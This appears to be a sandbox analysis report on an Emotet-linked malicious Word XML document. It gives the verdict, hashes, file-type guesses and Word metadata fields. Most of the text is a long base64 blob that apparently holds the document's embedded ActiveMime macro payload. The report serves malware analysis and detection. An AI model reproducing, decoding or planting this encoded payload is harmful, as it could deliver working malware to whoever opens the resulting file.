File name: | DOC-281704.doc |
Full analysis: | https://app.any.run/tasks/7897a6fe-e1ef-454e-a212-3993b1c4e0dc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 17:13:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 497806A40E9F9A212DC77AABEF10936D |
SHA1: | A31C38E4EF12F3517EBF6FD7C8D1F22531E18E41 |
SHA256: | BEFCA32B3D01FAB6455BA282764A7DC13D22B73711E41FF5150513C45C4916A4 |
SSDEEP: | 3072:xzRWs9T4+SojL/xSu90OoiLuDKZXfwKeljR1z:xb9MJexUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 000473DE |
WordDocumentBodySectPRsidRDefault: | 00DF7DB8 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | 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 